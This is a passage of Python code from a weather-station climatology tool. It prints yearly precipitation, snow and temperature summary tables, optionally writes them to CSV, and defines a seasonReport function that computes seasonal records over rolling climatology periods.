{:▒^6} {:▒^11} |".format("","DAYS","DAYS MAX","DAYS MIN","AVG", "MAX","MIN","DAYS","DAYS MAX","AVG", "MAX")) # Y PD PDx PDn PA PM Pmin SD SDx SA SM print("{:-^9} {:-^12} {:-^9} {:-^9} {:-^6} {:-^12} {:-^12} | {:-^11} {:-^9} {:-^6} {:-^11} |".format("","","","","","","","","","","")) print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>6.2f}, {:^4} {:>6.2f}, {:^4} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^4} |".format("All Time", alltime["prcpPROP"]["days"], round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1), alltime["prcpPROP"]["year_max_days"][0], alltime["prcpPROP"]["year_max_days"][1][0] if len(alltime["prcpPROP"]["year_max_days"][1]) == 1 else len(alltime["prcpPROP"]["year_max_days"][1]), alltime["prcpPROP"]["year_min_days"][0], alltime["prcpPROP"]["year_min_days"][1][0] if len(alltime["prcpPROP"]["year_min_days"][1]) == 1 else len(alltime["prcpPROP"]["year_min_days"][1]), round(mean(alltime["prcp"]),2) if len(alltime["prcp"]) > 0 else "--", round(alltime["prcpPROP"]["year_max"][0],2), alltime["prcpPROP"]["year_max"][1][0] if len(alltime["prcpPROP"]["year_max"][1]) == 1 else len(alltime["prcpPROP"]["year_max"][1]), round(alltime["prcpPROP"]["year_min"][0],2), alltime["prcpPROP"]["year_min"][1][0] if len(alltime["prcpPROP"]["year_min"][1]) == 1 else len(alltime["prcpPROP"]["year_min"][1]), alltime["snowPROP"]["days"] if alltime["snowPROP"]["days"] > 0 else "--", round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1) if alltime["snowPROP"]["days"] > 0 else "--", alltime["snowPROP"]["year_max_days"][0], alltime["snowPROP"]["year_max_days"][1][0] if len(alltime["snowPROP"]["year_max_days"][1]) == 1 else len(alltime["snowPROP"]["year_max_days"][1]), round(mean(alltime["snow"]),1) if len(alltime["snow"]) > 0 else "--", round(alltime["snowPROP"]["year_max"][0],2), alltime["snowPROP"]["year_max"][1][0] if len(alltime["snowPROP"]["year_max"][1]) == 1 else len(alltime["snowPROP"]["year_max"][1]))) for c in climo30yrs: #print(climo30yrs[c]["prcpPROP"]["days"],climo30yrs[c]["total_days"]) #print(climo30yrs[c]["snowPROP"]["days"],climo30yrs[c]["total_days"]) try: print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>6.2f}, {:^4} {:>6.2f}, {:^4} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^4} |".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), climo30yrs[c]["prcpPROP"]["days"], round(100 * climo30yrs[c]["prcpPROP"]["days"] / climo30yrs[c]["total_days"],1), climo30yrs[c]["prcpPROP"]["year_max_days"][0], climo30yrs[c]["prcpPROP"]["year_max_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_max_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_max_days"][1]), climo30yrs[c]["prcpPROP"]["year_min_days"][0], climo30yrs[c]["prcpPROP"]["year_min_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_min_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_min_days"][1]), round(mean(climo30yrs[c]["prcp"]),2), round(climo30yrs[c]["prcpPROP"]["year_max"][0],2), climo30yrs[c]["prcpPROP"]["year_max"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_max"][1]), round(climo30yrs[c]["prcpPROP"]["year_min"][0],2), climo30yrs[c]["prcpPROP"]["year_min"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_min"][1]), climo30yrs[c]["snowPROP"]["days"] if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", round(100 * climo30yrs[c]["snowPROP"]["days"] / climo30yrs[c]["total_days"],1) if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", climo30yrs[c]["snowPROP"]["year_max_days"][0], climo30yrs[c]["snowPROP"]["year_max_days"][1][0] if len(climo30yrs[c]["snowPROP"]["year_max_days"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["year_max_days"][1]), round(mean(climo30yrs[c]["snow"]),1) if len(climo30yrs[c]["snow"]) > 0 else "--", round(climo30yrs[c]["snowPROP"]["year_max"][0],2), climo30yrs[c]["snowPROP"]["year_max"][1][0] if len(climo30yrs[c]["snowPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["year_max"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("\nPart 2: Temperature Stats") print("{:▒^9} {:▒^37} | {:▒^37} | {:▒^37}".format("Years","AVG TEMP","TMAX","TMIN")) print("{:▒^9} {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12}".format("","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN")) # Y TSTDV TMA TMX TMn TSTDV TMA TMX TMn TSTDV TMA TMX TMn # "tempAVGlist": [],"tavgPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, print("{:-^9} {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12}".format("","","","","","","","","","","","","")) print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format("All Time", round(pstdev(alltime["tempAVGlist"]),1), round(mean(alltime["tempAVGlist_ind"]),1), round(alltime["tavgPROP"]["year_max"][0],1), alltime["tavgPROP"]["year_max"][1][0] if len(alltime["tavgPROP"]["year_max"][1]) == 1 else len(alltime["tavgPROP"]["year_max"][1]), round(alltime["tavgPROP"]["year_min"][0],1), alltime["tavgPROP"]["year_min"][1][0] if len(alltime["tavgPROP"]["year_min"][1]) == 1 else len(alltime["tavgPROP"]["year_min"][1]), round(pstdev(alltime["tmax"]),1), round(mean(alltime["tmax"]),1), round(alltime["tmaxPROP"]["year_max"][0],1), alltime["tmaxPROP"]["year_max"][1][0] if len(alltime["tmaxPROP"]["year_max"][1]) == 1 else len(alltime["tmaxPROP"]["year_max"][1]), round(alltime["tmaxPROP"]["year_min"][0],1), alltime["tmaxPROP"]["year_min"][1][0] if len(alltime["tmaxPROP"]["year_min"][1]) == 1 else len(alltime["tmaxPROP"]["year_min"][1]), round(pstdev(alltime["tmin"]),1), round(mean(alltime["tmin"]),1), round(alltime["tminPROP"]["year_max"][0],1), alltime["tminPROP"]["year_max"][1][0] if len(alltime["tminPROP"]["year_max"][1]) == 1 else len(alltime["tminPROP"]["year_max"][1]), round(alltime["tminPROP"]["year_min"][0],1), alltime["tminPROP"]["year_min"][1][0] if len(alltime["tminPROP"]["year_min"][1]) == 1 else len(alltime["tminPROP"]["year_min"][1]))) for c in climo30yrs: try: print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), round(pstdev(climo30yrs[c]["tempAVGlist"]),1), round(mean(climo30yrs[c]["tempAVGlist_ind"]),1), round(climo30yrs[c]["tavgPROP"]["year_max"][0],1), climo30yrs[c]["tavgPROP"]["year_max"][1][0] if len(climo30yrs[c]["tavgPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["year_max"][1]), round(climo30yrs[c]["tavgPROP"]["year_min"][0],1), climo30yrs[c]["tavgPROP"]["year_min"][1][0] if len(climo30yrs[c]["tavgPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["year_min"][1]), round(pstdev(climo30yrs[c]["tmax"]),1), round(mean(climo30yrs[c]["tmax"]),1), round(climo30yrs[c]["tmaxPROP"]["year_max"][0],1), climo30yrs[c]["tmaxPROP"]["year_max"][1][0] if len(climo30yrs[c]["tmaxPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["year_max"][1]), round(climo30yrs[c]["tmaxPROP"]["year_min"][0],1), climo30yrs[c]["tmaxPROP"]["year_min"][1][0] if len(climo30yrs[c]["tmaxPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["year_min"][1]), round(pstdev(climo30yrs[c]["tmin"]),1), round(mean(climo30yrs[c]["tmin"]),1), round(climo30yrs[c]["tminPROP"]["year_max"][0],1), climo30yrs[c]["tminPROP"]["year_max"][1][0] if len(climo30yrs[c]["tminPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["year_max"][1]), round(climo30yrs[c]["tminPROP"]["year_min"][0],1), climo30yrs[c]["tminPROP"]["year_min"][1][0] if len(climo30yrs[c]["tminPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["year_min"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("") if output == True: newfn = "yearReport_Jan-Dec_" + str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv" with open(newfn,"w") as w: headers = ["Assessed Period (Jan 1-Dec 31)","PRCP Days","PRCP % of days","PRCP stdev","PRCP AVG","SNOW Days","SNOW % of days","SNOW stdev","SNOW AVG","TAVG stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"] # HEADER for x in range(len(headers)): if x != len(headers) - 1: w.write(headers[x]); w.write(",") else: w.write(headers[x]); w.write("\n") w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",") w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",") w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmin"]))); w.write("\n") for x in climo30yrs: w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",") w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["prcpPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["snowPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmin"]))); w.write("\n") print("*** csv output successful ***") def seasonReport(season,climatology=30,increment=5,output=False): """Detailed Climatology Report for a Meteorological Season of interest. Months included in Meteorological seasons are as follows: Spring: 3,4,5 Summer: 6,7,8 Fall: 9,10,11 Winter: 12,1,2 Args: season: Season being inquired about. Accepted entries are: <"spring", "summer","fall"|"autumn","winter"> Keyword Args (optional): climatology = 30: The span of years that averages are calculated for (ie. '30 year climatology' or '30 year average'). This can be modified but should always be > the increment. increment = 5: Tells the script how often to assess/record successive climatologies. The smaller this is, the longer the report takes to generate. If kept at the default, for example, it would capture the 1976-2005, 1981-2010, and 1986-2015 climatologies and so forth. output = False: If set to True, the script will output a CSV file of its findings. This could be opened in a spreadsheet program for further analysis Examples: seasonReport("spring") -> Returns a 30-yr, 5-yr incremented climatological report for all Met. Spring's on record seasonReport("winter",climatology=15) -> Returns a 15-yr, 5-yr incremented climatological report for all Met. winters on record. seasonReport("summer",climatology=10,increment=1,output=True) -> Returns a 1-yr incremented, 10yr climatology report for all Met. Summers on record and outputs a CSV report. """ if season.lower() not in ["spring","summer","fall","autumn","winter"]: return print("* OOPS! {} is not a valid season. Try again!".format(season.capitalize())) if season.lower() == "autumn": season = "fall" season = season.lower() valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1)) #valid_yrs = [x for x in metclmt.keys() if type(x) == int] valid_yrs.sort() climo30yrs = {} for x in range(1811,max(valid_yrs)+1,increment): if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1): climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"season_max_days":[-1,[]],"season_min_days":[999,[]],"season_max":[-1,[]],"season_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"season_max_days":[-1,[]],"season_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"season_max":[-999,[]],"season_min":[999,[]]}, "tmax": [],"tmaxPROP":{"season_max":[-999,[]],"season_min":[999,[]]}, "tmin": [],"tminPROP":{"season_max":[-999,[]],"season_min":[999,[]]}} alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"season_max_days":[-1,[]],"season_min_days":[999,[]],"season_max":[-1,[]],"season_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"season_max_days":[-1,[]],"season_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"season_max":[-999,[]],"season_min":[999,[]]}, "tmax": [],"tmaxPROP":{"season_max":[-999,[]],"season_min":[999,[]]}, "tmin": [],"tminPROP":{"season_max":[-999,[]],"season_min":[999,[]]}} print("*** PLEASE WAIT. This will take a few moments ***") for y in valid_yrs: # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' alltime["total_days"] += metclmt[y][season]["recordqty"] # PRCP alltime["prcp"].append(sum(metclmt[y][season]["prcp"])) alltime["prcpPROP"]["days"] += metclmt[y][season]["prcpDAYS"] if metclmt[y][season]["prcpDAYS"] == alltime["prcpPROP"]["season_max_days"][0]: alltime["prcpPROP"]["season_max_days"][1].append(y) elif metclmt[y][season]["prcpDAYS"] > alltime["prcpPROP"]["season_max_days"][0]: alltime["prcpPROP"]["season_max_days"][0] = metclmt[y][season]["prcpDAYS"] alltime["prcpPROP"]["season_max_days"][1] = [] alltime["prcpPROP"]["season_max_days"][1].append(y) if sum(metclmt[y][season]["prcp"]) == alltime["prcpPROP"]["season_max"][0]: alltime["prcpPROP"]["season_max"][1].append(y) elif sum(metclmt[y][season]["prcp"]) > alltime["prcpPROP"]["season_max"][0]: alltime["prcpPROP"]["season_max"][0] = sum(metclmt[y][season]["prcp"]) alltime["prcpPROP"]["season_max"][1] = [] alltime["prcpPROP"]["season_max"][1].append(y) if metclmt[y][season]["recordqty"] > excludeseason: if metclmt[y][season]["prcpDAYS"] == alltime["prcpPROP"]["season_min_days"][0]: alltime["prcpPROP"]["season_min_days"][1].append(y) elif metclmt[y][season]["prcpDAYS"] < alltime["prcpPROP"]["season_min_days"][0]: alltime["prcpPROP"]["season_min_days"][0] = metclmt[y][season]["prcpDAYS"] alltime["prcpPROP"]["season_min_days"][1] = [] alltime["prcpPROP"]["season_min_days"][1].append(y) if sum(metclmt[y][season]["prcp"]) == alltime["prcpPROP"]["season_min"][0]: alltime["prcpPROP"]["season_min"][1].append(y) elif sum(metclmt[y][season]["prcp"]) < alltime["prcpPROP"]["season_min"][0]: alltime["prcpPROP"]["season_min"][0] = sum(metclmt[y][season]["prcp"]) alltime["prcpPROP"]["season_min"][1] = [] alltime["prcpPROP"]["season_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): climo30yrs[c]["prcp"].append(sum(metclmt[y][season]["prcp"])) climo30yrs[c]["prcpPROP"]["days"] += metclmt[y][season]["prcpDAYS"] climo30yrs[c]["total_days"] += metclmt[y][season]["recordqty"] if metclmt[y][season]["recordqty"] > excludeseason: if metclmt[y][season]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["season_max_days"][0]: climo30yrs[c]["prcpPROP"]["season_max_days"][1].append(y) elif metclmt[y][season]["prcpDAYS"] > climo30yrs[c]["prcpPROP"]["season_max_days"][0]: climo30yrs[c]["prcpPROP"]["season_max_days"][0] = metclmt[y][season]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["season_max_days"][1] = [] climo30yrs[c]["prcpPROP"]["season_max_days"][1].append(y) if metclmt[y][season]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["season_min_days"][0]: climo30yrs[c]["prcpPROP"]["season_min_days"][1].append(y) elif metclmt[y][season]["prcpDAYS"] < climo30yrs[c]["prcpPROP"]["season_min_days"][0]: climo30yrs[c]["prcpPROP"]["season_min_days"][0] = metclmt[y][season]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["season_min_days"][1] = [] climo30yrs[c]["prcpPROP"]["season_min_days"][1].append(y) if sum(metclmt[y][season]["prcp"]) == climo30yrs[c]["prcpPROP"]["season_max"][0]: climo30yrs[c]["prcpPROP"]["season_max"][1].append(y) elif sum(metclmt[y][season]["prcp"]) > climo30yrs[c]["prcpPROP"]["season_max"][0]: climo30yrs[c]["prcpPROP"]["season_max"][0] = sum(metclmt[y][season]["prcp"]) climo30yrs[c]["prcpPROP"]["season_max"][1] = [] climo30yrs[c]["prcpPROP"]["season_max"][1].append(y) if sum(metclmt[y][season]["prcp"]) == climo30yrs[c]["prcpPROP"]["season_min"][0]: climo30yrs[c]["prcpPROP"]["season_min"][1].append(y) elif sum(metclmt[y][season]["prcp"]) < climo30yrs[c]["prcpPROP"]["season_min"][0]: climo30yrs[c]["prcpPROP"]["season_min"][0] = sum(metclmt[y][season]["prcp"]) climo30yrs[c]["prcpPROP"]["season_min"][1] = [] climo30yrs[c]["prcpPROP"]["season_min"][1].append(y) # SNOW alltime["snow"].append(sum(metclmt[y][season]["snow"])) alltime["snowPROP"]["days"] += metclmt[y][season]["snowDAYS"] if metclmt[y][season]["recordqty"] > excludeseason: if metclmt[y][season]["snowDAYS"] == alltime["snowPROP"]["season_max_days"][0]: alltime["snowPROP"]["season_max_days"][1].append(y) elif metclmt[y][season]["snowDAYS"] > alltime["snowPROP"]["season_max_days"][0]: alltime["snowPROP"]["season_max_days"][0] = metclmt[y][season]["snowDAYS"] alltime["snowPROP"]["season_max_days"][1] = [] alltime["snowPROP"]["season_max_days"][1].append(y) if sum(metclmt[y][season]["snow"]) == alltime["snowPROP"]["season_max"][0]: alltime["snowPROP"]["season_max"][1].append(y) elif sum(metclmt[y][season]["snow"]) > alltime["snowPROP"]["season_max"][0]: alltime["snowPROP"]["season_max"][0] = sum(metclmt[y][season]["snow"]) alltime["snowPROP"]["season_max"][1] = [] alltime["snowPROP"]["season_max"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): climo30yrs[c]["snow"].append(sum(metclmt[y][season]["snow"])) climo30yrs[c]["snowPROP"]["days"] += metclmt[y][season]["snowDAYS"] if metclmt[y][season]["recordqty"] > excludeseason: if metclmt[y][season]["snowDAYS"] == climo30yrs[c]["snowPROP"]["season_max_days"][0]: climo30yrs[c]["snowPROP"]["season_max_days"][1].append(y) elif metclmt[y][season]["snowDAYS"] > climo30yrs[c]["snowPROP"]["season_max_days"][0]: climo30yrs[c]["snowPROP"]["season_max_days"][0] = metclmt[y][season]["snowDAYS"] climo30yrs[c]["snowPROP"]["season_max_days"][1] = [] climo30yrs[c]["snowPROP"]["season_max_days"][1].append(y) if sum(metclmt[y][season]["snow"]) == climo30yrs[c]["snowPROP"]["season_max"][0]: climo30yrs[c]["snowPROP"]["season_max"][1].append(y) elif sum(metclmt[y][season]["snow"]) > climo30yrs[c]["snowPROP"]["season_max"][0]: climo30yrs[c]["snowPROP"]["season_max"][0] = sum(metclmt[y][season]["snow"]) climo30yrs[c]["snowPROP"]["season_max"][1] = [] climo30yrs[c]["snowPROP"]["season_max"][1].append(y) # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' # TAVG for x in metclmt[y][season]["tempAVGlist"]: alltime["tempAVGlist_ind"].append(x) if len(metclmt[y][season]["tempAVGlist"]) > excludeseason_tavg: alltime["tempAVGlist"].append(mean(metclmt[y][season]["tempAVGlist"])) if mean(metclmt[y][season]["tempAVGlist"]) == alltime["tavgPROP"]["season_max"][0]: alltime["tavgPROP"]["season_max"][1].append(y) elif mean(metclmt[y][season]["tempAVGlist"]) > alltime["tavgPROP"]["season_max"][0]: alltime["tavgPROP"]["season_max"][0] = mean(metclmt[y][season]["tempAVGlist"]) alltime["tavgPROP"]["season_max"][1] = [] alltime["tavgPROP"]["season_max"][1].append(y) if mean(metclmt[y][season]["tempAVGlist"]) == alltime["tavgPROP"]["season_min"][0]: alltime["tavgPROP"]["season_min"][1].append(y) elif mean(metclmt[y][season]["tempAVGlist"]) < alltime["tavgPROP"]["season_min"][0]: alltime["tavgPROP"]["season_min"][0] = mean(metclmt[y][season]["tempAVGlist"]) alltime["tavgPROP"]["season_min"][1] = [] alltime["tavgPROP"]["season_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): for x in metclmt[y][season]["tempAVGlist"]:climo30yrs[c]["tempAVGlist_ind"].append(x) if len(metclmt[y][season]["tempAVGlist"]) > excludeseason_tavg: climo30yrs[c]["tempAVGlist"].append(mean(metclmt[y][season]["tempAVGlist"])) if mean(metclmt[y][season]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["season_max"][0]: climo30yrs[c]["tavgPROP"]["season_max"][1].append(y) elif mean(metclmt[y][season]["tempAVGlist"]) > climo30yrs[c]["tavgPROP"]["season_max"][0]: climo30yrs[c]["tavgPROP"]["season_max"][0] = mean(metclmt[y][season]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["season_max"][1] = [] climo30yrs[c]["tavgPROP"]["season_max"][1].append(y) if mean(metclmt[y][season]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["season_min"][0]: climo30yrs[c]["tavgPROP"]["season_min"][1].append(y) elif mean(metclmt[y][season]["tempAVGlist"]) < climo30yrs[c]["tavgPROP"]["season_min"][0]: climo30yrs[c]["tavgPROP"]["season_min"][0] = mean(metclmt[y][season]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["season_min"][1] = [] climo30yrs[c]["tavgPROP"]["season_min"][1].append(y) # TMAX for x in metclmt[y][season]["tmax"]: alltime["tmax"].append(x) if len(metclmt[y][season]["tmax"]) > excludeseason: if mean(metclmt[y][season]["tmax"]) == alltime["tmaxPROP"]["season_max"][0]: alltime["tmaxPROP"]["season_max"][1].append(y) elif mean(metclmt[y][season]["tmax"]) > alltime["tmaxPROP"]["season_max"][0]: alltime["tmaxPROP"]["season_max"][0] = mean(metclmt[y][season]["tmax"]) alltime["tmaxPROP"]["season_max"][1] = [] alltime["tmaxPROP"]["season_max"][1].append(y) if mean(metclmt[y][season]["tmax"]) == alltime["tmaxPROP"]["season_min"][0]: alltime["tmaxPROP"]["season_min"][1].append(y) elif mean(metclmt[y][season]["tmax"]) < alltime["tmaxPROP"]["season_min"][0]: alltime["tmaxPROP"]["season_min"][0] = mean(metclmt[y][season]["tmax"]) alltime["tmaxPROP"]["season_min"][1] = [] alltime["tmaxPROP"]["season_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): for x in metclmt[y][season]["tmax"]: climo30yrs[c]["tmax"].append(x) if len(metclmt[y][season]["tmax"]) > excludeseason: if mean(metclmt[y][season]["tmax"]) == climo30yrs[c]["tmaxPROP"]["season_max"][0]: climo30yrs[c]["tmaxPROP"]["season_max"][1].append(y) elif mean(metclmt[y][season]["tmax"]) > climo30yrs[c]["tmaxPROP"]["season_max"][0]: climo30yrs[c]["tmaxPROP"]["season_max"][0] = mean(metclmt[y][season]["tmax"]) climo30yrs[c]["tmaxPROP"]["season_max"][1] = [] climo30yrs[c]["tmaxPROP"]["season_max"][1].append(y) if mean(metclmt[y][season]["tmax"]) == climo30yrs[c]["tmaxPROP"]["season_min"][0]: climo30yrs[c]["tmaxPROP"]["season_min"][1].append(y) elif mean(metclmt[y][season]["tmax"]) < climo30yrs[c]["tmaxPROP"]["season_min"][0]: climo30yrs[c]["tmaxPROP"]["season_min"][0] = mean(metclmt[y][season]["tmax"]) climo30yrs[c]["tmaxPROP"]["season_min"][1] = [] climo30yrs[c]["tmaxPROP"]["season_min"][1].append(y) # TMIN for x in metclmt[y][season]["tmin"]: alltime["tmin"].append(x) if len(metclmt[y][season]["tmin"]) > excludeseason: if mean(metclmt[y][season]["tmin"]) == alltime["tminPROP"]["season_max"][0]: alltime["tminPROP"]["season_max"][1].append(y) elif mean(metclmt[y][season]["tmin"]) > alltime["tminPROP"]["season_max"][0]: alltime["tminPROP"]["season_max"][0] = mean(metclmt[y][season]["tmin"]) alltime["tminPROP"]["season_max"][1] = [] alltime["tminPROP"]["season_max"][1].append(y) if mean(metclmt[y][season]["tmin"]) == alltime["tminPROP"]["season_min"][0]: alltime["tminPROP"]["season_min"][1].append(y) elif mean(metclmt[y][season]["tmin"]) < alltime["tminPROP"]["season_min"][0]: alltime["tminPROP"]["season_min"][0] = mean(metclmt[y][season]["tmin"]) alltime["tminPROP"]["season_min"][1] = [] alltime["tminPROP"]["season_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): for x in metclmt[y][season]["tmin"]: climo30yrs[c]["tmin"].append(x) if len(metclmt[y][season]["tmin"]) > excludeseason: if mean(metclmt[y][season]["tmin"]) == climo30yrs[c]["tminPROP"]["season_max"][0]: climo30yrs[c]["tminPROP"]["season_max"][1].append(y) elif mean(metclmt[y][season]["tmin"]) > climo30yrs[c]["tminPROP"]["season_max"][0]: climo30yrs[c]["tminPROP"]["season_max"][0] = mean(metclmt[y][season]["tmin"]) climo30yrs[c]["tminPROP"]["season_max"][1] = [] climo30yrs[c]["tminPROP"]["season_max"][1].append(y) if mean(metclmt[y][season]["tmin"]) == climo30yrs[c]["tminPROP"]["season_min"][0]: climo30yrs[c]["tminPROP"]["season_min"][1].append(y) elif mean(metclmt[y][season]["tmin"]) < climo30yrs[c]["tminPROP"]["season_min"][0]: climo30yrs[c]["tminPROP"]["season_min"][0] = mean(metclmt[y][season]["tmin"]) climo30yrs[c]["tminPROP"]["season_min"][1] = [] climo30yrs[c]["tminPROP"]["season_min"][1].append(y) # PRINT REPORT print("---------------------------------------------------") print("Climatology Report for Meteorological {}".format(season.capitalize())) print("City: {}, {}".format(metclmt["station"],metclmt["station_name"])) print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology)) print("---------------------------------------------------") print("Part 1: Precipitation Stats") print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^11} |".format("Years","PRCP","PRCP","PRCP","PRCP","PRCP","PRCP","SNOW","SNOW","SNOW","SNOW")) print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^11} |".format("","DAYS","DAYS MAX","DAYS 